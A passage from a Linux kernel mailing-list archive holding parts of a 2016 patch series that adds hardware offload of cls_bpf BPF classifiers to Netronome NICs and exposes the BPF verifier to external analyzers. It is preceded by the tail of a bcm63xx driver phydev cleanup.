-   return genphy_restart_aneg(priv->phydev);
+   return genphy_restart_aneg(dev->phydev);
}
 
return -EOPNOTSUPP;
@@ -1456,9 +1453,9 @@ static int bcm_enet_get_settings(struct net_device *dev,
cmd->maxtxpkt = 0;
 
if (priv->has_phy) {
-   if (!priv->phydev)
+   if (!dev->phydev)
return -ENODEV;
-   return phy_ethtool_gset(priv->phydev, cmd);
+   return phy_ethtool_gset(dev->phydev, cmd);
} else {
cmd->autoneg = 0;
ethtool_cmd_speed_set(cmd, ((priv->force_speed_100)
@@ -1483,9 +1480,9 @@ static int bcm_enet_set_settings(struct net_device *dev,
 
priv = netdev_priv(dev);
if (priv->has_phy) {
-   if (!priv->phydev)
+   if (!dev->phydev)
return -ENODEV;
-   return phy_ethtool_sset(priv->phydev, cmd);
+   return phy_ethtool_sset(dev->phydev, cmd);
} else {
 
if (cmd->autoneg ||
@@ -1604,9 +1601,9 @@ static int bcm_enet_ioctl(struct net_device *dev, struct 
ifreq *rq, int cmd)
 
priv = netdev_priv(dev);
if (priv->has_phy) {
-   if (!priv->phydev)
+   if (!dev->phydev)
return -ENODEV;
-   return phy_mii_ioctl(priv->phydev, rq, cmd);
+   return phy_mii_ioctl(dev->phydev, rq, cmd);
} else {
struct mii_if_info mii;
 
diff --git a/drivers/net/ethernet/broadcom/bcm63xx_enet.h 
b/drivers/net/ethernet/broadcom/bcm63xx_enet.h
index f55af43..0a1b7b2 100644
--- a/drivers/net/ethernet/broadcom/bcm63xx_enet.h
+++ b/drivers/net/ethernet/broadcom/bcm63xx_enet.h
@@ -290,7 +290,6 @@ struct bcm_enet_priv {
 
/* used when a phy is connected (phylib used) */
struct mii_bus *mii_bus;
-   struct phy_device *phydev;
int old_link;
int old_duplex;
int old_pause;
-- 
1.7.4.4

[PATCHv6 net-next 03/15] net: cls_bpf: add support for marking filters as hardware-only

2016-09-18 Thread Jakub Kicinski

Add cls_bpf support for the TCA_CLS_FLAGS_SKIP_SW flag.

Signed-off-by: Jakub Kicinski 
Acked-by: Daniel Borkmann 
---
 net/sched/cls_bpf.c | 34 +-
 1 file changed, 25 insertions(+), 9 deletions(-)

diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 46af423a8a8f..18f9869cd4da 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -28,7 +28,7 @@ MODULE_DESCRIPTION("TC BPF based classifier");
 
 #define CLS_BPF_NAME_LEN   256
 #define CLS_BPF_SUPPORTED_GEN_FLAGS\
-   TCA_CLS_FLAGS_SKIP_HW
+   (TCA_CLS_FLAGS_SKIP_HW | TCA_CLS_FLAGS_SKIP_SW)
 
 struct cls_bpf_head {
struct list_head plist;
@@ -95,7 +95,9 @@ static int cls_bpf_classify(struct sk_buff *skb, const struct 
tcf_proto *tp,
 
qdisc_skb_cb(skb)->tc_classid = prog->res.classid;
 
-   if (at_ingress) {
+   if (tc_skip_sw(prog->gen_flags)) {
+   filter_res = prog->exts_integrated ? TC_ACT_UNSPEC : 0;
+   } else if (at_ingress) {
/* It is safe to push/pull even if skb_shared() */
__skb_push(skb, skb->mac_len);
bpf_compute_data_end(skb);
@@ -163,32 +165,42 @@ static int cls_bpf_offload_cmd(struct tcf_proto *tp, 
struct cls_bpf_prog *prog,
 tp->protocol, &offload);
 }
 
-static void cls_bpf_offload(struct tcf_proto *tp, struct cls_bpf_prog *prog,
-   struct cls_bpf_prog *oldprog)
+static int cls_bpf_offload(struct tcf_proto *tp, struct cls_bpf_prog *prog,
+  struct cls_bpf_prog *oldprog)
 {
struct net_device *dev = tp->q->dev_queue->dev;
struct cls_bpf_prog *obj = prog;
enum tc_clsbpf_command cmd;
+   bool skip_sw;
+   int ret;
+
+   skip_sw = tc_skip_sw(prog->gen_flags) ||
+   (oldprog && tc_skip_sw(oldprog->gen_flags));
 
if (oldprog && oldprog->offloaded) {
if (tc_should_offload(dev, tp, prog->gen_flags)) {
cmd = TC_CLSBPF_REPLACE;
-   } else {
+   } else if (!tc_skip_sw(prog->gen_flags)) {
obj = oldprog;
cmd = TC_CLSBPF_DESTROY;
+   } else {
+   return -EINVAL;
}
} else {
if (!tc_should_offload(dev, tp, prog->gen_flags))
-   return;
+   return skip_sw ? -EINVAL : 0;
cmd = TC_CLSBPF_ADD;
}
 
-   if (cls_bpf_offload_cmd(tp, obj, cmd))
-   return;
+   ret = cls_bpf_offload_cmd(tp, obj, cmd);
+   if (ret)
+   return skip_sw ? ret : 0;
 
obj->offloaded = true;
if (oldprog)
oldprog->offloaded = false;
+
+   return 0;
 }
 
 static void cls_bpf_stop_offload(struct tcf_proto *tp,
@@ -496,7 +508,11 @@ static int cls_bpf_change(struct net *net, struct sk_buff 
*in_skb,
if (ret < 0)
goto errout;
 
-   cls_bpf_offload(tp, prog, oldprog);
+   ret = cls_bpf_offload(tp, prog, oldprog);
+   if (ret) {
+   cls_bpf_delete_prog(tp, prog);
+   return ret;
+   }
 
if (oldprog) {
list_replace_rcu(&oldprog->link, &prog->link);
-- 
1.9.1

[PATCHv6 net-next 02/15] net: cls_bpf: limit hardware offload by software-only flag

2016-09-18 Thread Jakub Kicinski

Add cls_bpf support for the TCA_CLS_FLAGS_SKIP_HW flag.
Unlike U32 and flower cls_bpf already has some netlink
flags defined.  Create a new attribute to be able to use
the same flag values as the above.

Unlike U32 and flower reject unknown flags.

Signed-off-by: Jakub Kicinski 
Acked-by: Daniel Borkmann 
---
v3:
 - reject (instead of clear) unsupported flags;
 - fix error handling.
v2:
 - rename TCA_BPF_GEN_TCA_FLAGS -> TCA_BPF_FLAGS_GEN;
 - add comment about clearing unsupported flags;
 - validate flags after clearing unsupported.
---
 include/net/pkt_cls.h|  1 +
 include/uapi/linux/pkt_cls.h |  1 +
 net/sched/cls_bpf.c  | 22 --
 3 files changed, 22 insertions(+), 2 deletions(-)

diff --git a/include/net/pkt_cls.h b/include/net/pkt_cls.h
index 41e8071dff87..57af9f3032ff 100644
--- a/include/net/pkt_cls.h
+++ b/include/net/pkt_cls.h
@@ -498,6 +498,7 @@ struct tc_cls_bpf_offload {
struct bpf_prog *prog;
const char *name;
bool exts_integrated;
+   u32 gen_flags;
 };
 
 #endif
diff --git a/include/uapi/linux/pkt_cls.h b/include/uapi/linux/pkt_cls.h
index 8915b61bbf83..8fd715f806a2 100644
--- a/include/uapi/linux/pkt_cls.h
+++ b/include/uapi/linux/pkt_cls.h
@@ -396,6 +396,7 @@ enum {
TCA_BPF_FD,
TCA_BPF_NAME,
TCA_BPF_FLAGS,
+   TCA_BPF_FLAGS_GEN,
__TCA_BPF_MAX,
 };
 
diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 3ca9502a881c..46af423a8a8f 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -27,6 +27,8 @@ MODULE_AUTHOR("Daniel Borkmann ");
 MODULE_DESCRIPTION("TC BPF based classifier");
 
 #define CLS_BPF_NAME_LEN   256
+#define CLS_BPF_SUPPORTED_GEN_FLAGS\
+   TCA_CLS_FLAGS_SKIP_HW
 
 struct cls_bpf_head {
struct list_head plist;
@@ -40,6 +42,7 @@ struct cls_bpf_prog {
struct tcf_result res;
bool exts_integrated;
bool offloaded;
+   u32 gen_flags;
struct tcf_exts exts;
u32 handle;
union {
@@ -55,6 +58,7 @@ struct cls_bpf_prog {
 static const struct nla_policy bpf_policy[TCA_BPF_MAX + 1] = {
[TCA_BPF_CLASSID]   = { .type = NLA_U32 },
[TCA_BPF_FLAGS] = { .type = NLA_U32 },
+   [TCA_BPF_FLAGS_GEN] = { .type = NLA_U32 },
[TCA_BPF_FD]= { .type = NLA_U32 },
[TCA_BPF_NAME]  = { .type = NLA_NUL_STRING, .len = 
CLS_BPF_NAME_LEN },
[TCA_BPF_OPS_LEN]   = { .type = NLA_U16 },
@@ -153,6 +157,7 @@ static int cls_bpf_offload_cmd(struct tcf_proto *tp, struct 
cls_bpf_prog *prog,
bpf_offload.prog = prog->filter;
bpf_offload.name = prog->bpf_name;
bpf_offload.exts_integrated = prog->exts_integrated;
+   bpf_offload.gen_flags = prog->gen_flags;
 
return dev->netdev_ops->ndo_setup_tc(dev, tp->q->handle,
 tp->protocol, &offload);
@@ -166,14 +171,14 @@ static void cls_bpf_offload(struct tcf_proto *tp, struct 
cls_bpf_prog *prog,
enum tc_clsbpf_command cmd;
 
if (oldprog && oldprog->offloaded) {
-   if (tc_should_offload(dev, tp, 0)) {
+   if (tc_should_offload(dev, tp, prog->gen_flags)) {
cmd = TC_CLSBPF_REPLACE;
} else {
obj = oldprog;
cmd = TC_CLSBPF_DESTROY;
}
} else {
-   if (!tc_should_offload(dev, tp, 0))
+   if (!tc_should_offload(dev, tp, prog->gen_flags))
return;
cmd = TC_CLSBPF_ADD;
}
@@ -369,6 +374,7 @@ static int cls_bpf_modify_existing(struct net *net, struct 
tcf_proto *tp,
 {
bool is_bpf, is_ebpf, have_exts = false;
struct tcf_exts exts;
+   u32 gen_flags = 0;
int ret;
 
is_bpf = tb[TCA_BPF_OPS_LEN] && tb[TCA_BPF_OPS];
@@ -393,8 +399,17 @@ static int cls_bpf_modify_existing(struct net *net, struct 
tcf_proto *tp,
 
have_exts = bpf_flags & TCA_BPF_FLAG_ACT_DIRECT;
}
+   if (tb[TCA_BPF_FLAGS_GEN]) {
+   gen_flags = nla_get_u32(tb[TCA_BPF_FLAGS_GEN]);
+   if (gen_flags & ~CLS_BPF_SUPPORTED_GEN_FLAGS ||
+   !tc_flags_valid(gen_flags)) {
+   ret = -EINVAL;
+   goto errout;
+   }
+   }
 
prog->exts_integrated = have_exts;
+   prog->gen_flags = gen_flags;
 
ret = is_bpf ? cls_bpf_prog_from_ops(tb, prog) :
   cls_bpf_prog_from_efd(tb, prog, tp);
@@ -566,6 +581,9 @@ static int cls_bpf_dump(struct net *net, struct tcf_proto 
*tp, unsigned long fh,
bpf_flags |= TCA_BPF_FLAG_ACT_DIRECT;
if (bpf_flags && nla_put_u32(skb, TCA_BPF_FLAGS, bpf_flags))
goto nla_put_failure;
+   if (prog->gen_flags &&
+   nla_put_u32(skb, TCA_BPF_FLAGS_GEN, prog->gen_flags))
+   goto nla_put_failure;

[PATCHv6 net-next 05/15] bpf: expose internal verfier structures

2016-09-18 Thread Jakub Kicinski

Move verifier's internal structures to a header file and
prefix their names with bpf_ to avoid potential namespace
conflicts.  Those structures will soon be used by external
analyzers.

Signed-off-by: Jakub Kicinski 
Acked-by: Alexei Starovoitov 
Acked-by: Daniel Borkmann 
---
v5:
 - fix name of guard defines.
v4:
 - separate from adding the analyzer;
 - squash with the prefixing patch.
---
 include/linux/bpf_verifier.h |  78 +
 kernel/bpf/verifier.c| 263 +--
 2 files changed, 180 insertions(+), 161 deletions(-)
 create mode 100644 include/linux/bpf_verifier.h

diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
new file mode 100644
index ..9056117b4a81
--- /dev/null
+++ b/include/linux/bpf_verifier.h
@@ -0,0 +1,78 @@
+/* Copyright (c) 2011-2014 PLUMgrid, http://plumgrid.com
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of version 2 of the GNU General Public
+ * License as published by the Free Software Foundation.
+ */
+#ifndef _LINUX_BPF_VERIFIER_H
+#define _LINUX_BPF_VERIFIER_H 1
+
+#include  /* for enum bpf_reg_type */
+#include  /* for MAX_BPF_STACK */
+
+struct bpf_reg_state {
+   enum bpf_reg_type type;
+   union {
+   /* valid when type == CONST_IMM | PTR_TO_STACK | UNKNOWN_VALUE 
*/
+   s64 imm;
+
+   /* valid when type == PTR_TO_PACKET* */
+   struct {
+   u32 id;
+   u16 off;
+   u16 range;
+   };
+
+   /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
+*   PTR_TO_MAP_VALUE_OR_NULL
+*/
+   struct bpf_map *map_ptr;
+   };
+};
+
+enum bpf_stack_slot_type {
+   STACK_INVALID,/* nothing was stored in this stack slot */
+   STACK_SPILL,  /* register spilled into stack */
+   STACK_MISC/* BPF program wrote some data into this slot */
+};
+
+#define BPF_REG_SIZE 8 /* size of eBPF register in bytes */
+
+/* state of the program:
+ * type of all registers and stack info
+ */
+struct bpf_verifier_state {
+   struct bpf_reg_state regs[MAX_BPF_REG];
+   u8 stack_slot_type[MAX_BPF_STACK];
+   struct bpf_reg_state spilled_regs[MAX_BPF_STACK / BPF_REG_SIZE];
+};
+
+/* linked list of verifier states used to prune search */
+struct bpf_verifier_state_list {
+   struct bpf_verifier_state state;
+   struct bpf_verifier_state_list *next;
+};
+
+struct bpf_insn_aux_data {
+   enum bpf_reg_type ptr_type; /* pointer type for load/store insns */
+};
+
+#define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
+
+/* single container for all structs
+ * one verifier_env per bpf_check() call
+ */
+struct bpf_verifier_env {
+   struct bpf_prog *prog;  /* eBPF program being verified */
+   struct bpf_verifier_stack_elem *head; /* stack of verifier states to be 
processed */
+   int stack_size; /* number of states to be processed */
+   struct bpf_verifier_state cur_state; /* current verifier state */
+   struct bpf_verifier_state_list **explored_states; /* search pruning 
optimization */
+   struct bpf_map *used_maps[MAX_USED_MAPS]; /* array of map's used by 
eBPF program */
+   u32 used_map_cnt;   /* number of used maps */
+   u32 id_gen; /* used to generate unique reg IDs */
+   bool allow_ptr_leaks;
+   struct bpf_insn_aux_data *insn_aux_data; /* array of per-insn state */
+};
+
+#endif /* _LINUX_BPF_VERIFIER_H */
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index f5c1a4571331..9e0cd3fadf74 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -14,6 +14,7 @@
 #include 
 #include 
 #include 
+#include 
 #include 
 #include 
 #include 
@@ -126,81 +127,16 @@
  * are set to NOT_INIT to indicate that they are no longer readable.
  */
 
-struct reg_state {
-   enum bpf_reg_type type;
-   union {
-   /* valid when type == CONST_IMM | PTR_TO_STACK | UNKNOWN_VALUE 
*/
-   s64 imm;
-
-   /* valid when type == PTR_TO_PACKET* */
-   struct {
-   u32 id;
-   u16 off;
-   u16 range;
-   };
-
-   /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
-*   PTR_TO_MAP_VALUE_OR_NULL
-*/
-   struct bpf_map *map_ptr;
-   };
-};
-
-enum bpf_stack_slot_type {
-   STACK_INVALID,/* nothing was stored in this stack slot */
-   STACK_SPILL,  /* register spilled into stack */
-   STACK_MISC/* BPF program wrote some data into this slot */
-};
-
-#define BPF_REG_SIZE 8 /* size of eBPF register in bytes */
-
-/* state of the program:
- * type of all registers and stack info
- */
-struct verifier_stat

[PATCHv6 net-next 00/15] BPF hardware offload (cls_bpf for now)

2016-09-18 Thread Jakub Kicinski

Hi!

As spotted by Daniel JIT might have accessed indexes past the end
of verifier's reg_state array.

v6 (patch 8 only):
 - explicitly check for registers >= MAX_BPF_REG;
 - fix leaky error path.
v5:
 - fix names of guard defines in bpf_verfier.h.
v4:
 - rename parser -> analyzer;
 - reorganize the analyzer patches a bit;
 - use bitfield.h directly.

--- merge blurb:
In the last year a lot of progress have been made on offloading
simpler TC classifiers.  There is also growing interest in using
BPF for generic high-speed packet processing in the kernel.
It seems beneficial to tie those two trends together and think
about hardware offloads of BPF programs.  This patch set presents
such offload to Netronome smart NICs.  cls_bpf is extended with
hardware offload capabilities and NFP driver gets a JIT translator
which in presence of capable firmware can be used to offload
the BPF program onto the card.

BPF JIT implementation is not 100% complete (e.g. missing instructions)
but it is functional.  Encouragingly it should be possible to
offload most (if not all) advanced BPF features onto the NIC - 
including packet modification, maps, tunnel encap/decap etc.

Example of basic tests I used:
  __section_cls_entry
  int cls_entry(struct __sk_buff *skb)
  {
if (load_byte(skb, 0) != 0x0)
return 0;

if (load_byte(skb, 4) != 0x1)
return 0;

skb->mark = 0xcafe;

if (load_byte(skb, 50) != 0xff)
return 0;

return ~0U;
  }

Above code can be compiled with Clang and loaded like this:
# ethtool -K p1p1 hw-tc-offload on
# tc qdisc add dev p1p1 ingress
# tc filter add dev p1p1 parent :  bpf obj prog.o action drop

This set implements the basic transparent offload, the skip_{sw,hw}
flags and reporting statistics for cls_bpf.

Jakub Kicinski (15):
  net: cls_bpf: add hardware offload
  net: cls_bpf: limit hardware offload by software-only flag
  net: cls_bpf: add support for marking filters as hardware-only
  bpf: don't (ab)use instructions to store state
  bpf: expose internal verfier structures
  bpf: enable non-core use of the verfier
  bpf: recognize 64bit immediate loads as consts
  nfp: add BPF to NFP code translator
  nfp: bpf: add hardware bpf offload
  net: cls_bpf: allow offloaded filters to update stats
  nfp: bpf: allow offloaded filters to update stats
  nfp: bpf: add packet marking support
  net: act_mirred: allow statistic updates from offloaded actions
  nfp: bpf: add support for legacy redirect action
  nfp: bpf: add offload of TC direct action mode

 drivers/net/ethernet/netronome/nfp/Makefile|7 +
 drivers/net/ethernet/netronome/nfp/nfp_asm.h   |  233 +++
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h   |  212 +++
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c   | 1811 
 .../net/ethernet/netronome/nfp/nfp_bpf_verifier.c  |  171 ++
 drivers/net/ethernet/netronome/nfp/nfp_net.h   |   47 +-
 .../net/ethernet/netronome/nfp/nfp_net_common.c|  134 +-
 drivers/net/ethernet/netronome/nfp/nfp_net_ctrl.h  |   51 +-
 .../net/ethernet/netronome/nfp/nfp_net_ethtool.c   |   12 +
 .../net/ethernet/netronome/nfp/nfp_net_offload.c   |  291 
 .../net/ethernet/netronome/nfp/nfp_netvf_main.c|2 +-
 include/linux/bpf_verifier.h   |   89 +
 include/linux/netdevice.h  |2 +
 include/net/pkt_cls.h  |   16 +
 include/uapi/linux/pkt_cls.h   |1 +
 kernel/bpf/verifier.c  |  384 +++--
 net/sched/act_mirred.c |8 +
 net/sched/cls_bpf.c|  117 +-
 18 files changed, 3382 insertions(+), 206 deletions(-)
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_asm.h
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf.h
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_net_offload.c
 create mode 100644 include/linux/bpf_verifier.h

-- 
1.9.1

[PATCHv6 net-next 04/15] bpf: don't (ab)use instructions to store state

2016-09-18 Thread Jakub Kicinski

Storing state in reserved fields of instructions makes
it impossible to run verifier on programs already
marked as read-only. Allocate and use an array of
per-instruction state instead.

While touching the error path rename and move existing
jump target.

Suggested-by: Alexei Starovoitov 
Signed-off-by: Jakub Kicinski 
Acked-by: Alexei Starovoitov 
Acked-by: Daniel Borkmann 
---
v3:
 - new patch.
---
 kernel/bpf/verifier.c | 51 ---
 1 file changed, 32 insertions(+), 19 deletions(-)

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 90493a66..f5c1a4571331 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -181,6 +181,10 @@ struct verifier_stack_elem {
struct verifier_stack_elem *next;
 };
 
+struct bpf_insn_aux_data {
+   enum bpf_reg_type ptr_type; /* pointer type for load/store insns */
+};
+
 #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
 
 /* single container for all structs
@@ -196,6 +200,7 @@ struct verifier_env {
u32 used_map_cnt;   /* number of used maps */
u32 id_gen; /* used to generate unique reg IDs */
bool allow_ptr_leaks;
+   struct bpf_insn_aux_data *insn_aux_data; /* array of per-insn state */
 };
 
 #define BPF_COMPLEXITY_LIMIT_INSNS 65536
@@ -2334,7 +2339,7 @@ static int do_check(struct verifier_env *env)
return err;
 
} else if (class == BPF_LDX) {
-   enum bpf_reg_type src_reg_type;
+   enum bpf_reg_type *prev_src_type, src_reg_type;
 
/* check for reserved fields is already done */
 
@@ -2364,16 +2369,18 @@ static int do_check(struct verifier_env *env)
continue;
}
 
-   if (insn->imm == 0) {
+   prev_src_type = &env->insn_aux_data[insn_idx].ptr_type;
+
+   if (*prev_src_type == NOT_INIT) {
/* saw a valid insn
 * dst_reg = *(u32 *)(src_reg + off)
-* use reserved 'imm' field to mark this insn
+* save type to validate intersecting paths
 */
-   insn->imm = src_reg_type;
+   *prev_src_type = src_reg_type;
 
-   } else if (src_reg_type != insn->imm &&
+   } else if (src_reg_type != *prev_src_type &&
   (src_reg_type == PTR_TO_CTX ||
-   insn->imm == PTR_TO_CTX)) {
+   *prev_src_type == PTR_TO_CTX)) {
/* ABuser program is trying to use the same insn
 * dst_reg = *(u32*) (src_reg + off)
 * with different pointer types:
@@ -2386,7 +2393,7 @@ static int do_check(struct verifier_env *env)
}
 
} else if (class == BPF_STX) {
-   enum bpf_reg_type dst_reg_type;
+   enum bpf_reg_type *prev_dst_type, dst_reg_type;
 
if (BPF_MODE(insn->code) == BPF_XADD) {
err = check_xadd(env, insn);
@@ -2414,11 +2421,13 @@ static int do_check(struct verifier_env *env)
if (err)
return err;
 
-   if (insn->imm == 0) {
-   insn->imm = dst_reg_type;
-   } else if (dst_reg_type != insn->imm &&
+   prev_dst_type = &env->insn_aux_data[insn_idx].ptr_type;
+
+   if (*prev_dst_type == NOT_INIT) {
+   *prev_dst_type = dst_reg_type;
+   } else if (dst_reg_type != *prev_dst_type &&
   (dst_reg_type == PTR_TO_CTX ||
-   insn->imm == PTR_TO_CTX)) {
+   *prev_dst_type == PTR_TO_CTX)) {
verbose("same insn cannot be used with 
different pointers\n");
return -EINVAL;
}
@@ -2697,11 +2706,8 @@ static int convert_ctx_accesses(struct verifier_env *env)
else
continue;
 
-   if (insn->imm != PTR_TO_CTX) {
-   /* clear internal mark */
-   insn->imm = 0;
+   if (env->insn_aux_data[i].ptr_type != PTR_TO_CTX)
continue;
-   }
 
cnt = env->prog->aux->ops->
convert_ctx_access(type, insn->dst_reg, insn->src_reg,
@@ -2766,6 +2772,11 @@ int bpf_check(struct bpf_prog **prog, union bpf_attr 
*attr)

[PATCHv6 net-next 06/15] bpf: enable non-core use of the verfier

2016-09-18 Thread Jakub Kicinski

Advanced JIT compilers and translators may want to use
eBPF verifier as a base for parsers or to perform custom
checks and validations.

Add ability for external users to invoke the verifier
and provide callbacks to be invoked for every intruction
checked.  For now only add most basic callback for
per-instruction pre-interpretation checks is added.  More
advanced users may also like to have per-instruction post
callback and state comparison callback.

Signed-off-by: Jakub Kicinski 
Acked-by: Alexei Starovoitov 
---
v4:
 - separate from the header split patch.
---
 include/linux/bpf_verifier.h | 11 +++
 kernel/bpf/verifier.c| 68 
 2 files changed, 79 insertions(+)

diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
index 9056117b4a81..925359e1d9a1 100644
--- a/include/linux/bpf_verifier.h
+++ b/include/linux/bpf_verifier.h
@@ -59,6 +59,12 @@ struct bpf_insn_aux_data {
 
 #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
 
+struct bpf_verifier_env;
+struct bpf_ext_analyzer_ops {
+   int (*insn_hook)(struct bpf_verifier_env *env,
+int insn_idx, int prev_insn_idx);
+};
+
 /* single container for all structs
  * one verifier_env per bpf_check() call
  */
@@ -68,6 +74,8 @@ struct bpf_verifier_env {
int stack_size; /* number of states to be processed */
struct bpf_verifier_state cur_state; /* current verifier state */
struct bpf_verifier_state_list **explored_states; /* search pruning 
optimization */
+   const struct bpf_ext_analyzer_ops *analyzer_ops; /* external analyzer 
ops */
+   void *analyzer_priv; /* pointer to external analyzer's private data */
struct bpf_map *used_maps[MAX_USED_MAPS]; /* array of map's used by 
eBPF program */
u32 used_map_cnt;   /* number of used maps */
u32 id_gen; /* used to generate unique reg IDs */
@@ -75,4 +83,7 @@ struct bpf_verifier_env {
struct bpf_insn_aux_data *insn_aux_data; /* array of per-insn state */
 };
 
+int bpf_analyzer(struct bpf_prog *prog, const struct bpf_ext_analyzer_ops *ops,
+void *priv);
+
 #endif /* _LINUX_BPF_VERIFIER_H */
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 9e0cd3fadf74..ff03cd07f761 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -624,6 +624,10 @@ static int check_packet_access(struct bpf_verifier_env 
*env, u32 regno, int off,
 static int check_ctx_access(struct bpf_verifier_env *env, int off, int size,
enum bpf_access_type t, enum bpf_reg_type *reg_type)
 {
+   /* for analyzer ctx accesses are already validated and converted */
+   if (env->analyzer_ops)
+   return 0;
+
if (env->prog->aux->ops->is_valid_access &&
env->prog->aux->ops->is_valid_access(off, size, t, reg_type)) {
/* remember the offset of last byte accessed in ctx */
@@ -2216,6 +2220,15 @@ static int is_state_visited(struct bpf_verifier_env 
*env, int insn_idx)
return 0;
 }
 
+static int ext_analyzer_insn_hook(struct bpf_verifier_env *env,
+ int insn_idx, int prev_insn_idx)
+{
+   if (!env->analyzer_ops || !env->analyzer_ops->insn_hook)
+   return 0;
+
+   return env->analyzer_ops->insn_hook(env, insn_idx, prev_insn_idx);
+}
+
 static int do_check(struct bpf_verifier_env *env)
 {
struct bpf_verifier_state *state = &env->cur_state;
@@ -2274,6 +2287,10 @@ static int do_check(struct bpf_verifier_env *env)
print_bpf_insn(insn);
}
 
+   err = ext_analyzer_insn_hook(env, insn_idx, prev_insn_idx);
+   if (err)
+   return err;
+
if (class == BPF_ALU || class == BPF_ALU64) {
err = check_alu_op(env, insn);
if (err)
@@ -2823,3 +2840,54 @@ int bpf_check(struct bpf_prog **prog, union bpf_attr 
*attr)
kfree(env);
return ret;
 }
+
+int bpf_analyzer(struct bpf_prog *prog, const struct bpf_ext_analyzer_ops *ops,
+void *priv)
+{
+   struct bpf_verifier_env *env;
+   int ret;
+
+   env = kzalloc(sizeof(struct bpf_verifier_env), GFP_KERNEL);
+   if (!env)
+   return -ENOMEM;
+
+   env->insn_aux_data = vzalloc(sizeof(struct bpf_insn_aux_data) *
+prog->len);
+   ret = -ENOMEM;
+   if (!env->insn_aux_data)
+   goto err_free_env;
+   env->prog = prog;
+   env->analyzer_ops = ops;
+   env->analyzer_priv = priv;
+
+   /* grab the mutex to protect few globals used by verifier */
+   mutex_lock(&bpf_verifier_lock);
+
+   log_level = 0;
+
+   env->explored_states = kcalloc(env->prog->len,
+  sizeof(struct bpf_verifier_state_list *),
+

[PATCHv6 net-next 01/15] net: cls_bpf: add hardware offload

2016-09-18 Thread Jakub Kicinski

This patch adds hardware offload capability to cls_bpf classifier,
similar to what have been done with U32 and flower.

Signed-off-by: Jakub Kicinski 
Acked-by: Daniel Borkmann 
---
v3:
 - s/filter/prog/ in struct tc_cls_bpf_offload.
v2:
 - drop unnecessary WARN_ON;
 - reformat error handling a bit.
---
 include/linux/netdevice.h |  2 ++
 include/net/pkt_cls.h | 14 ++
 net/sched/cls_bpf.c   | 70 +++
 3 files changed, 86 insertions(+)

diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 2095b6ab3661..3c50db29a114 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -789,6 +789,7 @@ enum {
TC_SETUP_CLSU32,
TC_SETUP_CLSFLOWER,
TC_SETUP_MATCHALL,
+   TC_SETUP_CLSBPF,
 };
 
 struct tc_cls_u32_offload;
@@ -800,6 +801,7 @@ struct tc_to_netdev {
struct tc_cls_u32_offload *cls_u32;
struct tc_cls_flower_offload *cls_flower;
struct tc_cls_matchall_offload *cls_mall;
+   struct tc_cls_bpf_offload *cls_bpf;
};
 };
 
diff --git a/include/net/pkt_cls.h b/include/net/pkt_cls.h
index a459be5fe1c2..41e8071dff87 100644
--- a/include/net/pkt_cls.h
+++ b/include/net/pkt_cls.h
@@ -486,4 +486,18 @@ struct tc_cls_matchall_offload {
unsigned long cookie;
 };
 
+enum tc_clsbpf_command {
+   TC_CLSBPF_ADD,
+   TC_CLSBPF_REPLACE,
+   TC_CLSBPF_DESTROY,
+};
+
+struct tc_cls_bpf_offload {
+   enum tc_clsbpf_command command;
+   struct tcf_exts *exts;
+   struct bpf_prog *prog;
+   const char *name;
+   bool exts_integrated;
+};
+
 #endif
diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 1d92d4d3f222..3ca9502a881c 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -39,6 +39,7 @@ struct cls_bpf_prog {
struct list_head link;
struct tcf_result res;
bool exts_integrated;
+   bool offloaded;
struct tcf_exts exts;
u32 handle;
union {
@@ -137,6 +138,71 @@ static bool cls_bpf_is_ebpf(const struct cls_bpf_prog 
*prog)
return !prog->bpf_ops;
 }
 
+static int cls_bpf_offload_cmd(struct tcf_proto *tp, struct cls_bpf_prog *prog,
+  enum tc_clsbpf_command cmd)
+{
+   struct net_device *dev = tp->q->dev_queue->dev;
+   struct tc_cls_bpf_offload bpf_offload = {};
+   struct tc_to_netdev offload;
+
+   offload.type = TC_SETUP_CLSBPF;
+   offload.cls_bpf = &bpf_offload;
+
+   bpf_offload.command = cmd;
+   bpf_offload.exts = &prog->exts;
+   bpf_offload.prog = prog->filter;
+   bpf_offload.name = prog->bpf_name;
+   bpf_offload.exts_integrated = prog->exts_integrated;
+
+   return dev->netdev_ops->ndo_setup_tc(dev, tp->q->handle,
+tp->protocol, &offload);
+}
+
+static void cls_bpf_offload(struct tcf_proto *tp, struct cls_bpf_prog *prog,
+   struct cls_bpf_prog *oldprog)
+{
+   struct net_device *dev = tp->q->dev_queue->dev;
+   struct cls_bpf_prog *obj = prog;
+   enum tc_clsbpf_command cmd;
+
+   if (oldprog && oldprog->offloaded) {
+   if (tc_should_offload(dev, tp, 0)) {
